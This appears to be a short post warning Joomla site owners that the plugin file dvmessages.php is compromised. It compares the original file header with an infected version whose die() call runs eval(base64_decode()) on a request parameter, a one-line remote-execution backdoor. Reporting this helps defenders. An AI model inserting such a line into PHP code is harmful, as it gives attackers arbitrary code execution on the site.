dvmessages.php is being reported as phishing file?

Please be aware that there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity.

The original dvmessages.php file is look like this:

<?php
/**

*/

// no direct access
defined( ‘_JEXEC’ ) or die( ‘Restricted access’ );

jimport( ‘joomla.plugin.plugin’ );

But on the “infected” dvmessages.php

<?php
defined( ‘_JEXEC’ ) or die(@eval(base64_decode($_REQUEST[‘c_id’])));
jimport( ‘joomla.plugin.plugin’ );

Comments are closed.